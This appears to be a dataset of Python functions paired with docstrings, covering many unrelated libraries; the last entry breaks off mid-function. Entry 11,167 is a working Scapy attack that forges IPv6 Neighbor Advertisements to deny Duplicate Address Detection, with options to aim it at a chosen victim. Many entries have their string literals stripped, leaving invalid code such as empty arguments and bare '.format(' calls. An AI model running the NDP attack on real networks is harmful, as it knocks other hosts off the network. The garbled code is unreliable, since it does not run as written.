return string | Return string representation of HTML formatted version of table in current state.
Arguments:
start - index of first data row to include in output
end - index of last data row to include in output PLUS ONE (list slice style)
fields - names of fields (columns) to include
header - print a header showing field names (True or False)
border - print a border around the table (True or False)
hrules - controls printing of horizontal rules after rows. Allowed values: ALL, FRAME, HEADER, NONE
vrules - controls printing of vertical rules between columns. Allowed values: FRAME, ALL, NONE
int_format - controls formatting of integer data
float_format - controls formatting of floating point data
padding_width - number of spaces on either side of column data (only used if left and right paddings are None)
left_padding_width - number of spaces on left hand side of column data
right_padding_width - number of spaces on right hand side of column data
sortby - name of field to sort rows by
sort_key - sorting key function, applied to data points before sorting
attributes - dictionary of name/value pairs to include as HTML attributes in the <table> tag
xhtml - print <br/> tags if True, <br> tags if false |
11,132 | def partial(self, *args):
def part(*args2):
args3 = args + args2
return self.obj(*args3)
return self._wrap(part) | Partially apply a function by creating a version that has had some of
its arguments pre-filled, without changing its dynamic `this` context. |
11,133 | def _CreateDatabase(self):
goodlogging.Log.Info("DB", "Initialising new database", verbosity=self.logVerbosity)
with sqlite3.connect(self._dbPath) as db:
db.execute("CREATE TABLE Config ("
"Name TEXT UNIQUE NOT NULL, "
"Value TEXT)")
db.execute("CREATE TABLE IgnoredDir ("
"DirName TEXT UNIQUE NOT NULL)")
db.execute("CREATE TABLE SupportedFormat ("
"FileFormat TEXT UNIQUE NOT NULL)")
db.execute("CREATE TABLE TVLibrary ("
"ShowID INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT, "
"ShowName TEXT UNIQUE NOT NULL, "
"ShowDir TEXT UNIQUE)")
db.execute("CREATE TABLE FileName ("
"FileName TEXT UNIQUE NOT NULL, "
"ShowID INTEGER, "
"FOREIGN KEY (ShowID) REFERENCES ShowName(ShowID))")
db.execute("CREATE TABLE SeasonDir ("
"ShowID INTEGER, "
"Season INTEGER NOT NULL, "
"SeasonDir TEXT NOT NULL, "
"FOREIGN KEY (ShowID) REFERENCES ShowName(ShowID),"
"CONSTRAINT SeasonDirPK PRIMARY KEY (ShowID,Season))")
db.commit()
goodlogging.Log.Info("DB", "Database initialisation complete", verbosity=self.logVerbosity) | Create all database tables. |
11,134 | def __getCashToBuyStock(self):
account=self.__strategy.getAccountCopy()
if (account.getCash() >= account.getTotalValue() / self.buying_ratio):
return account.getTotalValue() / self.buying_ratio
else:
return 0 | calculate the amount of money to buy stock |
11,135 | def write_main(self):
    main_section = ''
main_header = self.write_main_header()
main_section = main_section + main_header
    main_section = main_section + '\n'
wf_declarations_to_write = self.write_main_wfdeclarations()
main_section = main_section + wf_declarations_to_write
jobs_to_write = self.write_main_jobwrappers()
main_section = main_section + jobs_to_write
if self.destBucket:
main_destbucket = self.write_main_destbucket()
main_section = main_section + main_destbucket
return main_section | Writes out a huge string representing the main section of the python
compiled toil script.
Currently looks at and writes 5 sections:
1. JSON Variables (includes importing and preparing files as tuples)
2. TSV Variables (includes importing and preparing files as tuples)
3. CSV Variables (includes importing and preparing files as tuples)
4. Wrapping each WDL "task" function as a toil job
5. List out children and encapsulated jobs by priority, then start job0.
This should create variable declarations necessary for function calls.
Map file paths appropriately and store them in the toil fileStore so
that they are persistent from job to job. Create job wrappers for toil.
And finally write out, and run the jobs in order of priority using the
addChild and encapsulate commands provided by toil.
:return: giant string containing the main def for the toil script. |
11,136 | def inferRowCompat(self, distribution):
if self.hack_ is None:
self.clean_outcpd()
return self.hack_.vecMaxProd(distribution) | Equivalent to the category inference of zeta1.TopLevel.
Computes the max_prod (maximum component of a component-wise multiply)
between the rows of the histogram and the incoming distribution.
May be slow if the result of clean_outcpd() is not valid.
:param distribution: Array of length equal to the number of columns.
:returns: array of length equal to the number of rows. |
11,137 | def compile_vocab(docs, limit=1e6, verbose=0, tokenizer=Tokenizer(stem=None, lower=None, strip=None)):
tokenizer = make_tokenizer(tokenizer)
d = Dictionary()
try:
limit = min(limit, docs.count())
docs = docs.iterator()
except (AttributeError, TypeError):
pass
for i, doc in enumerate(docs):
try:
doc = doc.values()
except AttributeError:
if not isinstance(doc, str):
                doc = ' '.join([str(v) for v in doc])
else:
doc = str(doc)
if i >= limit:
break
d.add_documents([list(tokenizer(doc))])
if verbose and not i % 100:
            log.info('{}: {}'.format(i, repr(d)[:120]))
return d | Get the set of words used anywhere in a sequence of documents and assign an integer id
This vectorizer is much faster than the scikit-learn version (and only requires low/constant RAM ?).
>>> gen = ('label: ' + chr(ord('A') + i % 3)*3 for i in range(11))
>>> d = compile_vocab(gen, verbose=0)
>>> d
<gensim.corpora.dictionary.Dictionary ...>
>>> print(d)
Dictionary(4 unique tokens: [u'AAA', u'BBB', u'CCC', u'label'])
>>> sorted(d.token2id.values())
[0, 1, 2, 3]
>>> sorted(d.token2id.keys())
[u'AAA', u'BBB', u'CCC', u'label'] |
11,138 | def search_messages(session, thread_id, query, limit=20,
offset=0, message_context_details=None,
window_above=None, window_below=None):
    query = {
        'thread_id': thread_id,
        'query': query,
        'limit': limit,
        'offset': offset
    }
    if message_context_details:
        query['message_context_details'] = message_context_details
    if window_above:
        query['window_above'] = window_above
    if window_below:
        query['window_below'] = window_below
response = make_get_request(session, , params_data=query)
json_data = response.json()
if response.status_code == 200:
        return json_data['result']
else:
raise MessagesNotFoundException(
            message=json_data['message'],
            error_code=json_data['error_code'],
            request_id=json_data['request_id']
) | Search for messages |
11,139 | def prepare_dispatches():
dispatches = []
target_messages = Message.get_without_dispatches()
cache = {}
for message_model in target_messages:
if message_model.cls not in cache:
message_cls = get_registered_message_type(message_model.cls)
subscribers = message_cls.get_subscribers()
cache[message_model.cls] = (message_cls, subscribers)
else:
message_cls, subscribers = cache[message_model.cls]
dispatches.extend(message_cls.prepare_dispatches(message_model))
return dispatches | Automatically creates dispatches for messages without them.
:return: list of Dispatch
:rtype: list |
11,140 | def greaterThan(self, value):
newq = self.copy()
newq.setOp(Query.Op.GreaterThan)
newq.setValue(value)
return newq | Sets the operator type to Query.Op.GreaterThan and sets the
value to the inputted value.
:param value <variant>
:return <Query>
:sa __gt__
:usage |>>> from orb import Query as Q
|>>> query = Q('test').greaterThan(1)
|>>> print query
|test greater_than 1 |
11,141 | def write_error(self, status_code, **kwargs):
if "exc_info" in kwargs:
exc_info = kwargs["exc_info"]
error = exc_info[1]
errormessage = "%s: %s" % (status_code, error)
self.render("error.html", errormessage=errormessage)
else:
errormessage = "%s" % (status_code)
self.render("error.html", errormessage=errormessage) | :param status_code:
:param kwargs:
:return: |
11,142 | def macontrol(self, data: ['SASdata', str] = None,
ewmachart: str = None,
machart: str = None,
procopts: str = None,
stmtpassthrough: str = None,
                  **kwargs: dict) -> 'SASresults':
| Python method to call the MACONTROL procedure
Documentation link:
https://go.documentation.sas.com/?cdcId=pgmsascdc&cdcVersion=9.4_3.4&docsetId=qcug&docsetTarget=qcug_macontrol_toc.htm&locale=en
:param data: SASdata object or string. This parameter is required.
:parm ewmachart: The ewmachart variable can only be a string type.
:parm machart: The machart variable can only be a string type.
:parm procopts: The procopts variable is a generic option available for advanced use. It can only be a string type.
:parm stmtpassthrough: The stmtpassthrough variable is a generic option available for advanced use. It can only be a string type.
:return: SAS Result Object |
11,143 | def get_edit_token(self):
if not self.edit_token or (time.time() - self.instantiation_time) > self.token_renew_period:
self.generate_edit_credentials()
self.instantiation_time = time.time()
return self.edit_token | Can be called in order to retrieve the edit token from an instance of WDLogin
:return: returns the edit token |
11,144 | async def disconnect(self):
self._is_shutdown = True
self.ready.clear()
self.update_state(NodeState.DISCONNECTING)
await self.player_manager.disconnect()
if self._ws is not None and self._ws.open:
await self._ws.close()
if self._listener_task is not None and not self.loop.is_closed():
self._listener_task.cancel()
self._state_handlers = []
_nodes.remove(self)
log.debug("Shutdown Lavalink WS.") | Shuts down and disconnects the websocket. |
11,145 | def lvscan(self):
self.open()
lv_list = []
lv_handles = lvm_vg_list_lvs(self.handle)
if not bool(lv_handles):
return lv_list
lvh = dm_list_first(lv_handles)
while lvh:
c = cast(lvh, POINTER(lvm_lv_list))
lv = LogicalVolume(self, lvh=c.contents.lv)
lv_list.append(lv)
if dm_list_end(lv_handles, lvh):
break
lvh = dm_list_next(lv_handles, lvh)
self.close()
return lv_list | Probes the volume group for logical volumes and returns a list of
LogicalVolume instances::
from lvm2py import *
lvm = LVM()
vg = lvm.get_vg("myvg")
lvs = vg.lvscan()
*Raises:*
* HandleError |
11,146 | def save(self, filename=None, *, gzipped=None, byteorder=None):
if gzipped is None:
gzipped = self.gzipped
if filename is None:
filename = self.filename
if filename is None:
            raise ValueError('No filename specified')
        open_file = gzip.open if gzipped else open
        with open_file(filename, 'wb') as buff:
self.write(buff, byteorder or self.byteorder) | Write the file at the specified location.
The `gzipped` keyword only argument indicates if the file should
be gzipped. The `byteorder` keyword only argument lets you
specify whether the file should be big-endian or little-endian.
If the method is called without any argument, it will default to
the instance attributes and use the file's `filename`,
`gzipped` and `byteorder` attributes. Calling the method without
a `filename` will raise a `ValueError` if the `filename` of the
file is `None`. |
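A brief sketch against the method above, assuming `f` is an instance of this file class that was previously loaded (so its `filename`, `gzipped` and `byteorder` attributes are populated):

```python
f.save()                              # rewrite the original file in place
f.save("copy.dat", gzipped=False)     # write an uncompressed copy elsewhere
f.save(byteorder="little")            # same path, little-endian byte order
```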
11,147 | def server_exists(s_name, ip=None, s_state=None, **connection_args):
server = _server_get(s_name, **connection_args)
if server is None:
return False
if ip is not None and ip != server.get_ipaddress():
return False
if s_state is not None and s_state.upper() != server.get_state():
return False
return True | Checks if a server exists
CLI Example:
.. code-block:: bash
salt '*' netscaler.server_exists 'serverName' |
11,148 | def _map_block_index_to_location(ir_blocks):
block_index_to_location = {}
current_block_ixs = []
for num, ir_block in enumerate(ir_blocks):
if isinstance(ir_block, blocks.GlobalOperationsStart):
if len(current_block_ixs) > 0:
unassociated_blocks = [ir_blocks[ix] for ix in current_block_ixs]
raise AssertionError(
                    u'Unexpectedly found IR blocks that are not associated with any location: '
                    u'{}'.format(unassociated_blocks))
break
current_block_ixs.append(num)
if isinstance(ir_block, blocks.MarkLocation):
for ix in current_block_ixs:
block_index_to_location[ix] = ir_block.location
current_block_ixs = []
return block_index_to_location | Associate each IR block with its corresponding location, by index. |
11,149 | def save_anim(self, fig, animate, init, bitrate=10000, fps=30):
from matplotlib import animation
anim = animation.FuncAnimation(fig, animate, init_func=init, frames=360, interval=20)
        FFMpegWriter = animation.writers['ffmpeg']
        writer = FFMpegWriter(bitrate=bitrate, fps=fps)
        self.avi_path = self.base_dir + self.short_name + '.avi'
        anim.save(self.avi_path, writer=writer, codec='mpeg4') | Not functional -- TODO |
11,150 | def count(self):
if self._total_count is None:
self._total_count = self._get_total_count()
return self._total_count | Approximate number of results, according to the API |
11,151 | def fetch(self, start=False, full_data=True):
if self.id is None:
return self
if full_data is True:
fields = None
elif isinstance(full_data, dict):
fields = full_data
else:
fields = {
"_id": 0,
"path": 1,
"params": 1,
"status": 1,
"retry_count": 1,
}
if start:
self.datestarted = datetime.datetime.utcnow()
self.set_data(self.collection.find_and_modify(
{
"_id": self.id,
"status": {"$nin": ["cancel", "abort", "maxretries"]}
},
{"$set": {
"status": "started",
"datestarted": self.datestarted,
"worker": self.worker.id
},
"$unset": {
"dateexpires": 1
}},
projection=fields)
)
context.metric("jobs.status.started")
else:
self.set_data(self.collection.find_one({
"_id": self.id
}, projection=fields))
if self.data is None:
context.log.info(
"Job %s not found in MongoDB or status was cancelled!" %
self.id)
self.stored = True
return self | Get the current job data and possibly flag it as started. |
11,152 | def personal_sign(self, message, account, password=None):
        return (yield from self.rpc_call('personal_sign',
[message, account, password])) | https://github.com/ethereum/go-ethereum/wiki/Management-APIs#personal_sign
:param message: Message for sign
:type message: str
:param account: Account address
:type account: str
:param password: Password of account (optional)
:type password: str
:return: signature
:rtype: str |
11,153 | def _cut_to_pieces(self, bunch_stack):
stack_len = len(bunch_stack[0])
for i in xrange(0, stack_len, self.fragment_length):
yield np.array(map(lambda stack: stack[i: i + self.fragment_length], bunch_stack)) | :type bunch_stack: list of list of int |
11,154 | async def setup_hostname() -> str:
    machine_id = open('/etc/machine-id').read().strip()
    hostname = machine_id[:6]
    with open('/etc/hostname', 'w') as ehn:
        ehn.write(f'{hostname}\n')
    LOG.debug("Setting hostname")
    proc = await asyncio.create_subprocess_exec(
        'hostname', hostname,
        stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE)
    stdout, stderr = await proc.communicate()
    ret = proc.returncode
    if ret != 0:
        LOG.error(
            f'Error setting hostname: {ret} '
            f'stdout: {stdout} stderr: {stderr}')
        raise RuntimeError("Couldn't set hostname")
    LOG.debug("Restarting avahi")
    proc = await asyncio.create_subprocess_exec(
        'systemctl', 'restart', 'avahi-daemon',
        stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE)
    stdout, stderr = await proc.communicate()
    ret = proc.returncode
    if ret != 0:
        LOG.error(
            f'Error restarting avahi-daemon: {ret} '
            f'stdout: {stdout} stderr: {stderr}')
        raise RuntimeError("Error restarting avahi")
    LOG.debug("Updated hostname and restarted avahi OK")
return hostname | Intended to be run when the server starts. Sets the machine hostname.
The machine hostname is set from the systemd-generated machine-id, which
changes at every boot.
Once the hostname is set, we restart avahi.
This is a separate task from establishing and changing the opentrons
machine name, which is UTF-8 and stored in /etc/machine-info as the
PRETTY_HOSTNAME and used in the avahi service name.
:returns: the hostname |
11,155 | def sign(self, value):
value = want_bytes(value)
timestamp = base64_encode(int_to_bytes(self.get_timestamp()))
sep = want_bytes(self.sep)
value = value + sep + timestamp
return value + sep + self.get_signature(value) | Signs the given string and also attaches a time information. |
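This matches the shape of itsdangerous' `TimestampSigner.sign`; a minimal usage sketch, assuming that library:

```python
from itsdangerous import TimestampSigner

signer = TimestampSigner("secret-key")
token = signer.sign("my value")    # b'my value.<timestamp>.<signature>'
signer.unsign(token, max_age=60)   # b'my value' if signed within the last 60 seconds
```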
11,156 | def modification_time(self):
    timestamp = getattr(
        self._cpio_archive_file_entry, 'modification_time', None)
if timestamp is None:
return None
return dfdatetime_posix_time.PosixTime(timestamp=timestamp) | dfdatetime.DateTimeValues: modification time or None if not available. |
11,157 | def register_type(self, typename):
typekey = typehash(typename)
if typekey in self._type_register:
raise ValueError("Type name collision. Type %s has the same hash." % repr(self._type_register[typekey]))
self._type_register[typekey] = typename | Registers a type name so that it may be used to send and receive packages.
:param typename: Name of the packet type. A method with the same name and a
"on_" prefix should be added to handle incomming packets.
:raises ValueError: If there is a hash code collision. |
11,158 | def issue_instant_ok(self):
upper = time_util.shift_time(time_util.time_in_a_while(days=1),
self.timeslack).timetuple()
lower = time_util.shift_time(time_util.time_a_while_ago(days=1),
-self.timeslack).timetuple()
issued_at = str_to_time(self.response.issue_instant)
return lower < issued_at < upper | Check that the response was issued at a reasonable time |
11,159 | def is_script(self, container):
try:
style = self._style(container)
            return style.get_value('position',
container) != TextPosition.NORMAL
except StyleException:
return False | Returns `True` if this styled text is super/subscript. |
11,160 | def _parse_proxy(proxy):
scheme, r_scheme = splittype(proxy)
if not r_scheme.startswith("/"):
scheme = None
authority = proxy
else:
if not r_scheme.startswith("//"):
raise ValueError("proxy URL with no authority: %r" % proxy)
end = r_scheme.find("/", 2)
if end == -1:
end = None
authority = r_scheme[2:end]
userinfo, hostport = splituser(authority)
if userinfo is not None:
user, password = splitpasswd(userinfo)
else:
user = password = None
return scheme, user, password, hostport | Return (scheme, user, password, host/port) given a URL or an authority.
If a URL is supplied, it must have an authority (host:port) component.
According to RFC 3986, having an authority component means the URL must
have two slashes after the scheme:
>>> _parse_proxy('file:/ftp.example.com/')
Traceback (most recent call last):
ValueError: proxy URL with no authority: 'file:/ftp.example.com/'
The first three items of the returned tuple may be None.
Examples of authority parsing:
>>> _parse_proxy('proxy.example.com')
(None, None, None, 'proxy.example.com')
>>> _parse_proxy('proxy.example.com:3128')
(None, None, None, 'proxy.example.com:3128')
The authority component may optionally include userinfo (assumed to be
username:password):
>>> _parse_proxy('joe:[email protected]')
(None, 'joe', 'password', 'proxy.example.com')
>>> _parse_proxy('joe:[email protected]:3128')
(None, 'joe', 'password', 'proxy.example.com:3128')
Same examples, but with URLs instead:
>>> _parse_proxy('http://proxy.example.com/')
('http', None, None, 'proxy.example.com')
>>> _parse_proxy('http://proxy.example.com:3128/')
('http', None, None, 'proxy.example.com:3128')
>>> _parse_proxy('http://joe:[email protected]/')
('http', 'joe', 'password', 'proxy.example.com')
>>> _parse_proxy('http://joe:[email protected]:3128')
('http', 'joe', 'password', 'proxy.example.com:3128')
Everything after the authority is ignored:
>>> _parse_proxy('ftp://joe:[email protected]/rubbish:3128')
('ftp', 'joe', 'password', 'proxy.example.com')
Test for no trailing '/' case:
>>> _parse_proxy('http://joe:[email protected]')
('http', 'joe', 'password', 'proxy.example.com') |
11,161 | def wait_for_current_tasks(self):
logger.info("Waiting for all remaining tasks to complete")
for task_id in self.tasks:
            fut = self.tasks[task_id]['app_fu']
if not fut.done():
logger.debug("Waiting for task {} to complete".format(task_id))
fut.exception()
logger.info("All remaining tasks completed") | Waits for all tasks in the task list to be completed, by waiting for their
AppFuture to be completed. This method will not necessarily wait for any tasks
added after cleanup has started (such as data stageout?) |
11,162 | def symmetry_reduce(tensors, structure, tol=1e-8, **kwargs):
sga = SpacegroupAnalyzer(structure, **kwargs)
symmops = sga.get_symmetry_operations(cartesian=True)
unique_mapping = TensorMapping([tensors[0]], [[]], tol=tol)
for tensor in tensors[1:]:
is_unique = True
for unique_tensor, symmop in itertools.product(unique_mapping, symmops):
if np.allclose(unique_tensor.transform(symmop), tensor, atol=tol):
unique_mapping[unique_tensor].append(symmop)
is_unique = False
break
if is_unique:
unique_mapping[tensor] = []
return unique_mapping | Function that converts a list of tensors corresponding to a structure
and returns a dictionary consisting of unique tensor keys with symmop
values corresponding to transformations that will result in derivative
tensors from the original list
Args:
tensors (list of tensors): list of Tensor objects to test for
symmetrically-equivalent duplicates
structure (Structure): structure from which to get symmetry
tol (float): tolerance for tensor equivalence
kwargs: keyword arguments for the SpacegroupAnalyzer
returns:
dictionary consisting of unique tensors with symmetry operations
corresponding to those which will reconstruct the remaining
tensors as values |
11,163 | def point_in_segment(ac, b):
(a,c) = ac
abc = [np.asarray(u) for u in (a,b,c)]
if any(len(u.shape) > 1 for u in abc): (a,b,c) = [np.reshape(u,(len(u),-1)) for u in abc]
else: (a,b,c) = abc
vab = b - a
vbc = c - b
vac = c - a
dab = np.sqrt(np.sum(vab**2, axis=0))
dbc = np.sqrt(np.sum(vbc**2, axis=0))
dac = np.sqrt(np.sum(vac**2, axis=0))
    return np.isclose(dab + dbc, dac) & ~np.isclose(dac,dab) & ~np.isclose(dac,dbc) | point_in_segment((a,b), c) yields True if point c is in segment (a,b) and False otherwise. Note
that this differs from point_on_segment in that if c is equal to a or b it is
considered 'on' but not 'in' the segment. |
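A small example derived from the code above (requires numpy):

```python
point_in_segment(((0, 0), (2, 2)), (1, 1))  # True: (1, 1) lies strictly inside the segment
point_in_segment(((0, 0), (2, 2)), (0, 0))  # False: an endpoint counts as 'on', not 'in'
point_in_segment(((0, 0), (2, 2)), (3, 3))  # False: outside the segment
```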
11,164 | def count_collisions(Collisions):
CollisionCount = 0
CollisionIndicies = []
lastval = True
for i, val in enumerate(Collisions):
if val == True and lastval == False:
CollisionIndicies.append(i)
CollisionCount += 1
lastval = val
return CollisionCount, CollisionIndicies | Counts the number of unique collisions and gets the collision index.
Parameters
----------
Collisions : array_like
Array of booleans, containing true if during a collision event, false otherwise.
Returns
-------
CollisionCount : int
Number of unique collisions
CollisionIndicies : list
Indices of collision occurrence |
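An illustrative call, derived from the function above (it counts False-to-True transitions):

```python
collisions = [False, True, True, False, True]
count_collisions(collisions)  # -> (2, [1, 4]): two distinct collision events, starting at indices 1 and 4
```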
11,165 | def exists(name=None, region=None, key=None, keyid=None, profile=None,
vpc_id=None, vpc_name=None, group_id=None):
conn = _get_conn(region=region, key=key, keyid=keyid, profile=profile)
group = _get_group(conn, name=name, vpc_id=vpc_id, vpc_name=vpc_name,
group_id=group_id, region=region, key=key, keyid=keyid,
profile=profile)
if group:
return True
else:
return False | Check to see if a security group exists.
CLI example::
salt myminion boto_secgroup.exists mysecgroup |
11,166 | def print_results(self):
if self.package_data.get():
print(.format(c.Style.BRIGHT, c.Fore.BLUE))
for p in self.package_data[]:
print(
.format(
p.get(), c.Style.BRIGHT, c.Fore.CYAN, p.get()
)
)
print(.format(c.Style.BRIGHT, c.Fore.BLUE))
for p in self.package_data[]:
if isinstance(p.get(), list):
n = 5
list_data = p.get()
print(
.format(
p.get(), c.Style.BRIGHT, c.Fore.CYAN, .join(p.get()[:n])
)
)
del list_data[:n]
for data in [
list_data[i : i + n] for i in range(0, len(list_data), n)
]:
print(
.format(
, c.Style.BRIGHT, c.Fore.CYAN, .join(data)
)
)
else:
print(
.format(
p.get(), c.Style.BRIGHT, c.Fore.CYAN, p.get()
)
)
if self.package_data.get():
print(.format(c.Style.BRIGHT, c.Fore.BLUE))
for p in self.package_data[]:
print(
.format(
p.get(), c.Style.BRIGHT, c.Fore.CYAN, p.get()
)
)
if not self.args.ignore_validation:
print()
for error in self.package_data.get():
print(.format(c.Fore.RED, error))
self.exit_code = 1 | Print results of the package command. |
11,167 | def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None):
def na_reply_callback(req, reply_mac, iface):
mac = req[Ether].src
dst = req[IPv6].dst
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac) / IPv6(src=tgt, dst=dst)
rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1)
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
sendp(rep, iface=iface, verbose=0)
print("Reply NA for target address %s (received from %s)" % (tgt, mac))
_NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
tgt_filter, reply_mac) | Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3756. This is done by listening incoming NS messages *sent from the
unspecified address* and sending a NA reply for the target address,
leading the peer to believe that another node is also performing DAD
for that address.
By default, the fake NA sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the target address found in received NS.
- as IPv6 destination address: the link-local solicited-node multicast
address derived from the target address in received NS.
- the mac address of the interface as source (or reply_mac, see below).
- the multicast mac address derived from the solicited node multicast
address used as IPv6 destination address.
- A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
with the mac address used as source of the NA.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g. "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface. This
address will also be used in the Target Link-Layer Address option. |
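A hedged invocation sketch (requires Scapy and raw-socket privileges; every value below is an illustrative placeholder):
```python
# Limit the DoS to NS messages from one victim MAC and one target address,
# spoofing the NA replies from a chosen source MAC.
NDP_Attack_DAD_DoS_via_NA(
    iface="eth0",
    mac_src_filter="00:13:72:8c:b5:69",
    tgt_filter="2001:db8::1",
    reply_mac="00:11:22:33:44:55",
)
```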
11,168 | def cover(self, match_set):
assert isinstance(match_set, MatchSet)
assert match_set.model.algorithm is self
condition = bitstrings.BitCondition.cover(
match_set.situation,
self.wildcard_probability
)
action_candidates = (
frozenset(match_set.model.possible_actions) -
frozenset(match_set)
)
if not action_candidates:
action_candidates = match_set.model.possible_actions
action = random.choice(list(action_candidates))
return XCSClassifierRule(
condition,
action,
self,
match_set.time_stamp
) | Return a new classifier rule that can be added to the match set,
with a condition that matches the situation of the match set and an
action selected to avoid duplication of the actions already
contained therein. The match_set argument is a MatchSet instance
representing the match set to which the returned rule may be added.
Usage:
match_set = model.match(situation)
if model.algorithm.covering_is_required(match_set):
new_rule = model.algorithm.cover(match_set)
assert new_rule.condition(situation)
model.add(new_rule)
match_set = model.match(situation)
Arguments:
match_set: A MatchSet instance.
Return:
A new ClassifierRule instance, appropriate for the addition to
match_set and to the classifier set from which match_set was
drawn. |
11,169 | def matching_tokens(self, text, start=0):
for token_class, regexp in self._tokens:
match = regexp.match(text, pos=start)
if match:
yield token_class, match | Retrieve all token definitions matching the beginning of a text.
Args:
text (str): the text to test
start (int): the position where matches should be searched in the
string (see re.match(rx, txt, pos))
Yields:
(token_class, re.Match): every token class whose regexp matches the
text, and the related re.Match object. |
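A self-contained sketch of the pattern the generator above relies on: a hypothetical lexer whose `_tokens` attribute is a list of `(token_class, compiled_regexp)` pairs.
```python
import re

class TinyLexer:
    def __init__(self):
        # (token_class, compiled regexp) pairs, as matching_tokens expects.
        self._tokens = [
            ("INT", re.compile(r"\d+")),
            ("WORD", re.compile(r"[a-z]+")),
        ]

    def matching_tokens(self, text, start=0):
        for token_class, regexp in self._tokens:
            match = regexp.match(text, pos=start)
            if match:
                yield token_class, match

for cls, m in TinyLexer().matching_tokens("42abc"):
    print(cls, m.group())   # INT 42 -- only the INT pattern matches at position 0
```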
11,170 | def install(args: List[str]) -> None:
with clean_pip_env():
subprocess_env = os.environ.copy()
sitedir_index = _first_sitedir_index()
_extend_python_path(subprocess_env, sys.path[sitedir_index:])
process = subprocess.Popen(
[sys.executable, "-m", "pip", "--disable-pip-version-check", "install"] + args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=subprocess_env,
)
for output in process.stdout:
if output:
click.echo(output.decode().rstrip())
if process.wait() > 0:
sys.exit(PIP_INSTALL_ERROR) | `pip install` as a function.
Accepts a list of pip arguments.
.. code-block:: py
>>> install(['numpy', '--target', 'site-packages'])
Collecting numpy
Downloading numpy-1.13.3-cp35-cp35m-manylinux1_x86_64.whl (16.9MB)
100% || 16.9MB 53kB/s
Installing collected packages: numpy
Successfully installed numpy-1.13.3 |
11,171 | def build_index_from_design(df, design, remove_prefix=None, types=None, axis=1, auto_convert_numeric=True, unmatched_columns=):
df = df.copy()
if not in design.index.names:
design = design.set_index()
if remove_prefix is None:
remove_prefix = []
if type(remove_prefix) is str:
remove_prefix=[remove_prefix]
unmatched_for_index = []
names = design.columns.values
idx_levels = len(names)
indexes = []
if auto_convert_numeric:
design = design.apply(pd.to_numeric, errors="ignore")
design.index = design.index.astype(str)
if types:
for n, t in types.items():
if n in design.columns.values:
design[n] = design[n].astype(t)
for lo in df.columns.values:
l = copy(lo)
for s in remove_prefix:
l = l.replace(s, '')
l = l.strip()
l = numeric(l)
try:
idx = design.loc[str(l)]
except:
if unmatched_columns:
unmatched_for_index.append(lo)
else:
idx = tuple([None] * idx_levels)
indexes.append(idx)
else:
idx = tuple(idx.values)
indexes.append(idx)
if axis == 0:
df.index = pd.MultiIndex.from_tuples(indexes, names=names)
else:
if unmatched_columns == :
df = df.set_index(unmatched_for_index, append=True)
elif unmatched_columns == :
df = df.drop(unmatched_for_index, axis=1)
df.columns = pd.MultiIndex.from_tuples(indexes, names=names)
df = df.sort_index(axis=1)
return df | Build a MultiIndex from a design table.
Supply a table with column headings for the new multiindex
and an index containing the labels to search for in the data.
:param df:
:param design:
:param remove_prefix:
:param types:
:param axis:
:param auto_convert_numeric:
:return: |
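A hedged usage sketch. The sample-label index name ("Label") and the column layout are assumptions made for illustration; adjust them to the real design table.
```python
import pandas as pd

# Two measurement columns whose names (after stripping the prefix) appear
# in the design table's label index.
df = pd.DataFrame({
    "Intensity.Sample_A": [1.0, 2.0],
    "Intensity.Sample_B": [3.0, 4.0],
})
design = pd.DataFrame(
    {"Group": ["Control", "Treated"], "Replicate": [1, 1]},
    index=pd.Index(["Sample_A", "Sample_B"], name="Label"),  # assumed index name
)

indexed = build_index_from_design(df, design, remove_prefix="Intensity.")
print(indexed.columns)
# Expected: a 2-level MultiIndex with levels named 'Group' and 'Replicate'.
```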
11,172 | def ics2task():
from argparse import ArgumentParser, FileType
from sys import stdin
parser = ArgumentParser(description=)
parser.add_argument(, nargs=, type=FileType(), default=stdin,
help=)
parser.add_argument(, nargs=, help=, default=expanduser())
args = parser.parse_args()
vobject = readOne(args.infile.read())
task = IcsTask(args.outdir)
for todo in vobject.vtodo_list:
task.to_task(todo) | Command line tool to convert from iCalendar to Taskwarrior |
11,173 | def _addToSegmentUpdates(self, c, i, segUpdate):
if segUpdate is None or len(segUpdate.activeSynapses) == 0:
return
key = (c, i)
if key in self.segmentUpdates:
self.segmentUpdates[key] += [(self.lrnIterationIdx, segUpdate)]
else:
self.segmentUpdates[key] = [(self.lrnIterationIdx, segUpdate)] | Store a dated potential segment update. The "date" (iteration index) is used
later to determine whether the update is too old and should be forgotten.
This is controlled by parameter ``segUpdateValidDuration``.
:param c: TODO: document
:param i: TODO: document
:param segUpdate: TODO: document |
11,174 | def obj_box_zoom(
im, classes=None, coords=None, zoom_range=(0.9,
1.1), row_index=0, col_index=1, channel_index=2, fill_mode=,
cval=0., order=1, is_rescale=False, is_center=False, is_random=False, thresh_wh=0.02, thresh_wh2=12.
):
if classes is None:
classes = []
if coords is None:
coords = []
if len(zoom_range) != 2:
raise Exception( , zoom_range)
if is_random:
if zoom_range[0] == 1 and zoom_range[1] == 1:
zx, zy = 1, 1
tl.logging.info(" random_zoom : not zoom in/out")
else:
zx, zy = np.random.uniform(zoom_range[0], zoom_range[1], 2)
else:
zx, zy = zoom_range
zoom_matrix = np.array([[zx, 0, 0], [0, zy, 0], [0, 0, 1]])
h, w = im.shape[row_index], im.shape[col_index]
